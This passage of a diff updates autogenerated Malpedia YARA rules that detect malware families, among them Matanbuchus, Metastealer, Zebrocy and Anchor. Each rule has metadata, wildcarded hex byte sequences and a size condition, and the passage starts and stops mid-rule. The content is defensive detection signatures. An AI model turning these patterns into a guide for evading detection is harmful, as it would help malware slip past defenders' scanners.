-		license_url = "N/A"
-		logic_hash = "b7e9c1f7a0f9288f7f968855b7e176a67e0d0fef09a3da04bc264465377e4dae"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { e9???????? 488b8a38000000 e9???????? 488b8a40000000 4883c118 e9???????? 488b8a38000000 }
-		$sequence_1 = { 488d4c2428 e8???????? 4c8b00 8ad3 488bc8 41ff5040 }
-		$sequence_2 = { 65488b042558000000 ba04000000 488b0cc8 8b040a 3905???????? 7f19 488d0580080600 }
-		$sequence_3 = { 4a8d0c37 eb0b 0fb607 48ffc7 c644042001 483bf9 75f0 }
-		$sequence_4 = { 488b0cc8 8b040a 3905???????? 7f1e 488d0576ef0500 488b4c2440 }
-		$sequence_5 = { 41b840000000 458d78d0 418bd7 488d4d28 e8???????? 448bc0 488d55e0 }
-		$sequence_6 = { e8???????? 488bd0 4438700a 7429 498bfe 408acf }
-		$sequence_7 = { 488d15fad00200 488d0dd32c0500 e8???????? 84c0 7543 448b0d???????? 4c8d05bc2c0500 }
-		$sequence_8 = { 488bd6 488d4c2460 e8???????? 90 488b5808 48897808 488b4c2468 }
-		$sequence_9 = { 4c8d2518470300 895c2420 81fb80000000 0f8dd7000000 4863fb 498b34fc 4885f6 }
-
-	condition:
-		7 of them and filesize < 971776
-}
-rule MALPEDIA_Win_Zupdax_Auto : FILE
+rule MALPEDIA_Win_Alice_Atm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7482dbc-f70b-5a30-84dd-76b8876bc623"
+		id = "501a026b-dba7-501a-810b-0b737ec59325"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zupdax_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alice_atm_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "c678dda4eb233d445c52eec76463d1638934195de484c67d217556190a9036d4"
+		logic_hash = "d552c74f415e09d46d22c314024829e6b9aa2356b6f2a8ec27602ddc27a1083f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79443,32 +79840,32 @@ rule MALPEDIA_Win_Zupdax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8b6c2408 56 57 33c9 33f6 33ff }
-		$sequence_1 = { 895e28 895e2c e8???????? 8b460c 83c404 3bc3 }
-		$sequence_2 = { 894714 8b4618 895618 894718 33db 83c61c }
-		$sequence_3 = { 895e28 895e2c e8???????? 8b460c }
-		$sequence_4 = { 895e10 895e14 e8???????? 83c404 5f 5b }
-		$sequence_5 = { 81e6ff000080 7908 4e 81ce00ffffff 46 8a1c06 881c01 }
-		$sequence_6 = { 33c9 33f6 33ff 394c2414 765b }
-		$sequence_7 = { 50 895e24 895e28 895e2c e8???????? 8b460c }
-		$sequence_8 = { 7419 8b4c2408 8b7e10 51 }
-		$sequence_9 = { ff15???????? 8d442444 83c0fe 668b4802 83c002 }
+		$sequence_0 = { 4b 75d4 ff75f8 e8???????? }
+		$sequence_1 = { 56 57 33ff 57 e8???????? a3???????? 6a03 }
+		$sequence_2 = { 6a40 e8???????? 0bc0 7434 8945fc 8bf8 }
+		$sequence_3 = { 83c604 33ff 47 3b7d0c 741b ff36 57 }
+		$sequence_4 = { ff7508 51 ff35???????? 68???????? ff15???????? 0bc0 743f }
+		$sequence_5 = { 0fb7c0 8945f8 8b7d10 83ff00 }
+		$sequence_6 = { ff15???????? 0bc0 742a 8bd8 833d????????00 740b }
+		$sequence_7 = { 897dfc 8d45f8 50 6a00 ff7508 e8???????? }
+		$sequence_8 = { e9???????? 817d0c11010000 0f85ed000000 8b4d10 }
+		$sequence_9 = { 817e0c20202000 0f8480000000 ff36 68???????? 8d45f8 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Targetcompany_Auto : FILE
+rule MALPEDIA_Win_Ziyangrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1b7a89e-2688-52a1-8c7d-13cb0d455b2e"
+		id = "201f34db-38cb-5eda-937b-85ae79e54374"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.targetcompany_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ziyangrat_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "7d65ff06dda40a31d2e8e57267ae5018fe6d616cb14d7c02506f36589aa887d7"
+		logic_hash = "f833bf74199bebd7dff936e145830c4820d190515f18da15b78535e3254684ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79477,89 +79874,37 @@ rule MALPEDIA_Win_Targetcompany_Auto : FILE
 		signator_config = "callsandjumps;datarefs;binvalue"
 		malpedia_rule_date = "20241030"
 		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { e8???????? 83c424 8d8574ffffff 50 8d85ecdcffff 50 ff15???????? }
-		$sequence_1 = { 75f1 8db57cffffff e8???????? 8bf0 }
-		$sequence_2 = { 8945e4 3d01010000 7d0d 8a4c181c 8888d8e84100 40 ebe9 }
-		$sequence_3 = { c20800 56 8bf0 81fffeffff7f 7605 e8???????? 8b4618 }
-		$sequence_4 = { a5 ff759c 895dd0 53 6a40 ff15???????? 8bf0 }
-		$sequence_5 = { 6a01 68???????? 33db 53 e8???????? 85c0 7c56 }
-		$sequence_6 = { 8d45f8 50 6a1f 53 897de4 8975f8 ff15???????? }
-		$sequence_7 = { 33c5 8945fc 53 56 57 8d9dccf9ffff 8bf9 }
-		$sequence_8 = { 56 57 8945f4 8945f8 3905???????? 7516 8b0d???????? }
-		$sequence_9 = { 25ffff7f00 c1e108 33d2 0bc8 0bda 8bc1 8b4df8 }
-
-	condition:
-		7 of them and filesize < 328704
-}
-rule MALPEDIA_Win_Dadjoke_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7e6ed0b6-d7e2-510d-b9a1-64b59097a88b"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dadjoke_auto.yar#L1-L236"
-		license_url = "N/A"
-		logic_hash = "012b91fdf9c20cf8af04f39b868e60895f8a732788d300f19ff99d8e0ff61772"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 56 57 6800081000 6a00 }
-		$sequence_1 = { 740a 8b55f4 52 ff15???????? 837df000 740c }
-		$sequence_2 = { 51 8d5508 52 8d4db8 e8???????? 6a0a 6a00 }
-		$sequence_3 = { f3a5 8bca 83e103 f3a4 a1???????? 8945d0 }
-		$sequence_4 = { eb39 6800081000 e8???????? 83c404 8945f8 }
-		$sequence_5 = { 6bc200 8b4c05e4 51 e8???????? 83c408 }
-		$sequence_6 = { 8b4580 8bc8 c1e902 f3a5 8bc8 83e103 }
-		$sequence_7 = { ff15???????? 8945f8 837df800 7c76 8b4d08 }
-		$sequence_8 = { 33c9 84c0 0f94c1 8bc1 c3 a1???????? }
-		$sequence_9 = { ff15???????? 85c0 7417 b920000000 }
-		$sequence_10 = { 5e c3 8bff 55 8bec 83ec10 33c0 }
-		$sequence_11 = { e8???????? c3 6a04 e8???????? 59 c3 6a0c }
-		$sequence_12 = { 50 8b08 ff5108 8b85e4faffff 50 8b08 ff5108 }
-		$sequence_13 = { 52 50 8b08 ff5118 8b85e0faffff 50 }
-		$sequence_14 = { a900000080 7541 d9ec d9c9 d9f1 833d????????00 0f85cc140000 }
-		$sequence_15 = { 84c0 75f9 8d7d90 2bd6 4f 90 8a4701 }
-		$sequence_16 = { 6a00 50 c645f800 e8???????? 83c40c c7458c00000000 }
-		$sequence_17 = { 6a00 ff15???????? 8b85e0faffff 8d95e8faffff }
-		$sequence_18 = { 6a00 8d4590 50 68???????? 53 }
-		$sequence_19 = { 8bca 83e103 6a00 f3a4 68???????? ff15???????? 8bf0 }
-		$sequence_20 = { 8854382a 8b048d58047500 8874382b 8b048d58047500 5a 8854382c eb3b }
-		$sequence_21 = { 8d85e8fbffff 2bca 50 51 53 }
-		$sequence_22 = { 833d????????00 0f857c0e0000 8d0da0c37400 ba1b000000 }
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 2bd3 7506 41 83f912 7ce2 3bcf 7eaf }
+		$sequence_1 = { 3d204e0000 0f8f210b0000 ffd5 2bc6 3df4010000 7e95 ffd5 }
+		$sequence_2 = { 66a5 f7d3 53 a4 e8???????? 8d7c2410 83c9ff }
+		$sequence_3 = { c644240800 f3ab 66ab aa 8bbc2410040000 85ff }
+		$sequence_4 = { ff15???????? 8a0d???????? a1???????? 33d2 891d???????? }
+		$sequence_5 = { 50 6801010000 e8???????? 8bce c1e106 8d540c5c 52 }
+		$sequence_6 = { 49 8bf9 8b4c2464 41 83f91a 894c2464 0f825effffff }
+		$sequence_7 = { 7407 8b4c2424 880429 45 8887244d4100 47 81e7ff0f0000 }
+		$sequence_8 = { c64424534f c644245455 c644245644 c64424572e c64424580d }
+		$sequence_9 = { 85c0 0f84dd000000 8b44241c 3bc3 7634 8d4c241c }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Hdmr_Auto : FILE
+rule MALPEDIA_Win_Matanbuchus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85c97022-d8c5-5e21-a936-553f640fe4f6"
+		id = "a3fb7262-831d-5cfb-8abc-cea45bc828f6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hdmr_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matanbuchus_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "9a001b5acc5aa25620fae4ae86be71364f80188dbdc0b08b5c1ad9fa793fd746"
+		logic_hash = "4f8fe54f712fa0006512f2c2876f2933c4c245339d29133362ca02de9b0dcb22"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79573,32 +79918,32 @@ rule MALPEDIA_Win_Hdmr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4514 8b16 8b527c 50 57 }
-		$sequence_1 = { 7511 8b4d0c 8b5018 51 8bce }
-		$sequence_2 = { 8b048540d04100 83e61f c1e606 59 c644300400 85ff }
-		$sequence_3 = { 83c40c 33f6 e8???????? 25ff000080 7907 48 0d00ffffff }
-		$sequence_4 = { be00000000 7454 f6c301 7445 8d8df0f5ffff }
-		$sequence_5 = { 0f84e1030000 6a00 6a00 6a00 }
-		$sequence_6 = { 5e 8bc8 8b929c000000 5d }
-		$sequence_7 = { 53 ff15???????? 85c0 7451 57 e8???????? 83c404 }
-		$sequence_8 = { 33cb 33480c 8bdf c1eb08 894df0 8b4d08 81e3ff000000 }
-		$sequence_9 = { 33c0 68fe070000 50 8d8c2472020000 51 8974241c 6689842474020000 }
+		$sequence_0 = { 33c0 e9???????? 8b45e8 8b4d08 03483c }
+		$sequence_1 = { 035120 8955dc 8b45f4 8b4d08 03481c 894dcc c745f000000000 }
+		$sequence_2 = { 8b55f0 8b4214 8945e8 33c9 66894dfc }
+		$sequence_3 = { 8b55ec 813a50450000 7407 33c0 e9???????? 8b45ec }
+		$sequence_4 = { 8b45e8 8b4d08 03483c 894dec 8b55ec }
+		$sequence_5 = { 8b4508 8945f8 8b4df8 8b513c 035508 }
+		$sequence_6 = { 69c293010001 50 b901000000 c1e100 034d08 51 e8???????? }
+		$sequence_7 = { 034508 8945e0 8b4de0 8b5178 035508 8955f0 8b45f0 }
+		$sequence_8 = { 8955f4 8b45f4 83780400 0f84a6000000 8b4df4 }
+		$sequence_9 = { 894dec 8b55ec 813a50450000 7407 }
 
 	condition:
-		7 of them and filesize < 284672
+		7 of them and filesize < 13077504
 }
-rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE
+rule MALPEDIA_Win_Metastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be050b96-89fd-5c20-8efb-0926890fbf17"
+		id = "03175067-a9b5-54bf-936c-98a9cdf892a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.abaddon_pos_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.metastealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1a83ebbcd5f12576760f9d6a9d7b6611b9e3fe508d3c27448de58b24db2266af"
+		logic_hash = "88c2cf894d34c5f1940f86cdfe567315a89acface2e055dfbbf9e01110d9ea97"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79612,37 +79957,32 @@ rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750a 83fb3c 7605 e9???????? }
-		$sequence_1 = { 7417 80fa00 7612 80fa7c 7505 e9???????? }
-		$sequence_2 = { 42 89d9 01d1 803930 7205 803939 760f }
-		$sequence_3 = { 80fd3e 7406 41 80fd3f 756e 49 }
-		$sequence_4 = { 0fafc3 038560feffff 6a00 6a00 }
-		$sequence_5 = { 6860ea0000 ffb40564feffff ff15???????? 89d8 6bc004 }
-		$sequence_6 = { 740a 80393d 7405 803944 7536 80bea80100000d }
-		$sequence_7 = { 6a00 ff15???????? 8945f0 6a00 ff15???????? c785c0feffff28010000 6a00 }
-		$sequence_8 = { 31c0 48 31d2 8a841eb8010000 }
-		$sequence_9 = { 7605 e9???????? 48 034510 48 0500040000 803800 }
-		$sequence_10 = { 89e5 48 83ec20 48 c7c100000000 }
-		$sequence_11 = { 2c30 80ea30 666bc00a 48 01d0 48 89da }
-		$sequence_12 = { 48 89c7 48 8d86b8010000 48 }
-		$sequence_13 = { 81c3f8030000 8903 48 31db 48 8b96d0050000 }
-		$sequence_14 = { 750d c6013d c786b401000002000000 eb13 }
+		$sequence_0 = { ff75a0 ff7704 ff37 e8???????? 8b4704 83c410 c78564ffffffffffff7f }
+		$sequence_1 = { f20f10c2 42 f20f5ec2 f20f5ac0 f30f11448e08 8b75c4 035d10 }
+		$sequence_2 = { e8???????? 84c0 752d 8b4508 8b4018 894508 85c0 }
+		$sequence_3 = { f30f5acb f30f5ac4 f20f590cce f20f58c8 f20f2dd1 81faff000000 760e }
+		$sequence_4 = { ff760c 68???????? 50 e8???????? 83c418 8bf8 c645fc07 }
+		$sequence_5 = { e8???????? 83c404 8945f4 85c0 0f84c0150000 8bc8 33d2 }
+		$sequence_6 = { ffd0 0fb78e48020000 83c41c 3bc1 7416 68???????? 53 }
+		$sequence_7 = { c78510f7ffff00000000 c78514f7ffff0000f03f e8???????? 68???????? 8d45a0 c7459800000000 50 }
+		$sequence_8 = { c74610b4000000 b92d000000 c74614bf000000 be???????? f3a5 68???????? c680b400000000 }
+		$sequence_9 = { f7472800008000 744e 8d8f88000000 85db 7506 46 8975fc }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 26230784
 }
-rule MALPEDIA_Win_Bitter_Rat_Auto : FILE
+rule MALPEDIA_Win_Zebrocy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b3eda11e-9841-5a64-a760-3d15b12e8c6a"
+		id = "3e5f6c21-b107-5927-ab15-3b5f7930bd9f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bitter_rat_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zebrocy_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "0cafad6913e5947920a6576295487b4fcd67fc675f1ae39a216d82d179786bf2"
+		logic_hash = "441b6c0eb1e7ad657ed1ddd776f40e36e6f7013a1b8efb6494c5b91191385474"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79656,34 +79996,40 @@ rule MALPEDIA_Win_Bitter_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 898558d9ffff 8b8558d9ffff }
-		$sequence_1 = { 50 68???????? e8???????? 83c40c 8b45f8 83c002 8945f8 }
-		$sequence_2 = { 8bf4 8d853cecffff 50 ff15???????? 3bf4 e8???????? 52 }
-		$sequence_3 = { 40 ff05???????? f7460c0c010000 754e 53 57 8d3c8518104700 }
-		$sequence_4 = { 57 8d3c8500124700 8b07 83e61f }
-		$sequence_5 = { ff15???????? 3bf4 e8???????? 8985e0fbffff e8???????? 0fb6852bfcffff 85c0 }
-		$sequence_6 = { 8dbdf4fdffff b983000000 b8cccccccc f3ab }
-		$sequence_7 = { 8d8dccd8ffff 51 6a01 8d95d8d8ffff 52 a1???????? 50 }
-		$sequence_8 = { 83c40c 8bf4 6804010000 68???????? 6a00 }
-		$sequence_9 = { 53 56 57 8dbd94dbffff b91b090000 b8cccccccc }
+		$sequence_0 = { 8945e4 e8???????? 89f9 89c6 e8???????? 8b55e4 }
+		$sequence_1 = { 8d45f4 64a300000000 8b01 8d7160 8b4804 8975f0 c74431a05c444200 }
+		$sequence_2 = { ff0d???????? ff15???????? 8b0d???????? 89048d489b4200 }
+		$sequence_3 = { 8bc8 8bc6 c644246001 e8???????? be10000000 3974242c 720d }
+		$sequence_4 = { a3???????? 8078086c 7507 c605????????01 }
+		$sequence_5 = { 8d51bf 55 8d4120 80fa19 89e5 }
+		$sequence_6 = { c686c800000043 c6864b01000043 c74668d0874200 6a0d }
+		$sequence_7 = { 83f83f 7f07 894c8204 40 8902 5d }
+		$sequence_8 = { 53 8d70ff 31db 31c0 39f3 }
+		$sequence_9 = { 7505 e8???????? 84db 7407 }
+		$sequence_10 = { b9ffff0000 663bc8 750e c745ec04000000 8da42400000000 837dec00 }
+		$sequence_11 = { 8b4508 33f6 89b578ffffff ba0f000000 895314 }
+		$sequence_12 = { 42 89f9 884b08 ebe7 83c42c 5b }
+		$sequence_13 = { e9???????? 8d4dd4 e9???????? 8d8d08ffffff e9???????? 8d4db8 }
+		$sequence_14 = { 7306 8d8508f7ffff 8a1c38 8db598f6ffff e8???????? }
+		$sequence_15 = { eb50 31d2 89d9 e8???????? }
 
 	condition:
-		7 of them and filesize < 1130496
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Elf_Satori_Auto : FILE
+rule MALPEDIA_Win_Anchor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7bafa756-820c-5aa5-a514-aecea3797f7c"
+		id = "3aabb030-7441-5b84-a113-08295754555e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.satori_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anchor_auto.yar#L1-L208"
 		license_url = "N/A"
-		logic_hash = "971903fb2922c6e0d29023431fedc1f613a69ac9544f2c3e1cb57d7bab55e6a5"
+		logic_hash = "3a0df58657b834f57e58b8e626451593809f6f92127cc7c303935ce966927900"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -79695,32 +80041,44 @@ rule MALPEDIA_Elf_Satori_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? c704241f000000 e8???????? c7042420000000 e8???????? c7042420000000 }
-		$sequence_1 = { ffb51c040000 e8???????? 83c420 6800400000 6a02 }
-		$sequence_2 = { 53 89cb 83ec0c 85c9 8b542420 }
-		$sequence_3 = { c784245809000000000000 fc 8dbc2438090000 31c0 ab ab }
-		$sequence_4 = { a1???????? 83f8ff 7431 83ec0c 50 e8???????? c705????????ffffffff }
-		$sequence_5 = { 7d02 89c2 c784243805000000000000 c78424340500000a000000 83ec0c }
-		$sequence_6 = { 888335040000 19c0 83e003 05a4000000 894304 89d8 }
-		$sequence_7 = { c685360400000b e9???????? 50 6800020000 6a00 8d8c2444060000 }
-		$sequence_8 = { 89ea b803000000 e8???????? 85c0 89442440 }
-		$sequence_9 = { 8884242e220000 8a84242d220000 c684242d22000030 8884242f220000 83ec0c 6a03 }
+		$sequence_0 = { 740c 66c740016578 c6400365 eb0a 66c74001646c c640036c }
+		$sequence_1 = { 6aff 6a00 8d45bc c645fc03 }
+		$sequence_2 = { b101 e8???????? e8???????? 84c0 }
+		$sequence_3 = { 8d45f4 50 e8???????? cc ff25???????? 6a08 68???????? }
+		$sequence_4 = { 8d8dbcfeffff e8???????? 68???????? 8d8dbcfeffff e8???????? 56 8d8dbcfeffff }
+		$sequence_5 = { 2bc2 3bca 7701 48 }
+		$sequence_6 = { ff15???????? 8b15???????? 8bc8 2bc2 }
+		$sequence_7 = { e8???????? 8b0d???????? c1e102 51 }
+		$sequence_8 = { 8b4638 66897810 8b4638 5f 66894812 33c9 }
+		$sequence_9 = { 7509 33d2 33c9 e8???????? }
+		$sequence_10 = { 488d0d5e160400 e8???????? 488b8d80010000 e8???????? }
+		$sequence_11 = { 448865b7 4c8bc0 4c2bc3 488bd3 488d4db7 e8???????? 488d55b7 }
+		$sequence_12 = { 488d0d5c510200 e8???????? 488d8558010000 48894528 }
+		$sequence_13 = { 488d0d5d2c0300 e8???????? 488b8d08010000 e8???????? }
+		$sequence_14 = { 488d0d5c490300 e8???????? 488d0d28490300 e8???????? }
+		$sequence_15 = { 488d0d5a920200 e8???????? 488b8de0000000 e8???????? }
+		$sequence_16 = { 4903c7 c64405b032 4903c7 c64405b02e }
+		$sequence_17 = { 448d4f01 418bd1 448d5772 668908 8d4f75 488b4310 66894802 }
+		$sequence_18 = { 75ae 8bc7 483d00040000 0f83c8010000 44888c05c0050000 }
+		$sequence_19 = { 488d0d5da00100 e8???????? 90 488d0d48d10200 }
+		$sequence_20 = { 488b4338 66894804 8d4f77 488b4338 66894806 8d4f6f 488b4338 }
+		$sequence_21 = { 488d0d5a870200 e8???????? 90 488b8500010000 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 778240
 }
-rule MALPEDIA_Win_Sarhust_Auto : FILE
+rule MALPEDIA_Win_Proto8_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52e2651a-2a6e-5230-b7b1-6048b76df517"
+		id = "083740c0-add4-5086-9bb3-129b00384856"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sarhust_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.proto8_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "714fe7fd57f34b3db5ebbf318cfb9e33c9b49986cf0bcf43914f2398aec0102c"
+		logic_hash = "f52122f494b07ec03552d51c6b0687cd994e16514778e5ef2160e099630dd732"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79734,34 +80092,34 @@ rule MALPEDIA_Win_Sarhust_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
-		$sequence_1 = { 6801000080 ff15???????? 85c0 7408 ff15???????? }
-		$sequence_2 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
-		$sequence_3 = { eb08 8b4520 8b4d0c 8908 }
-		$sequence_4 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff }
-		$sequence_5 = { 8d8d4cffffff e8???????? 6a00 ff15???????? }
-		$sequence_6 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
-		$sequence_7 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? }
-		$sequence_8 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
-		$sequence_9 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_0 = { 8b4730 452bf7 412bc1 452bf4 443bf0 458bee 440f43e8 }
+		$sequence_1 = { 7454 488b0b 4885c9 742b 488b8100020000 48c70000000000 b801000000 }
+		$sequence_2 = { 488d4c2458 493bfd 480f43cb 4c8bc6 4c3bf6 4d0f42c6 e8???????? }
+		$sequence_3 = { c744243001000000 488b7308 488b2b 48c744242002000000 4c8d0de0db0500 488bd6 488bcd }
+		$sequence_4 = { 75b3 448b542430 4183f873 0f8400feffff 488b4c2470 ffc3 413bda }
+		$sequence_5 = { f6c314 7424 c1eb02 450fb6ce 80e301 4c8bc6 488bd7 }
+		$sequence_6 = { 83f803 0f85cd000000 4584ed 751c 8d43ff 443bd8 7407 }
+		$sequence_7 = { 894310 4585f6 7510 418d7e01 448bfe 89bc24b8000000 eb12 }
+		$sequence_8 = { e8???????? 85c0 750a c744242804000000 eb14 89442420 c744242401000000 }
+		$sequence_9 = { 48c744243800000000 4c8bc8 48894c2430 4c8bc7 488d4c2460 48894c2428 33c9 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 2537472
 }
-rule MALPEDIA_Win_Nimbo_C2_Auto : FILE
+rule MALPEDIA_Win_Simplefilemover_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3fbf9b9f-3200-52f3-a15f-1eaff92b5ed0"
+		id = "14bdd8f8-6142-5a38-9205-708716e93989"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimbo_c2_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.simplefilemover_auto.yar#L1-L222"
 		license_url = "N/A"
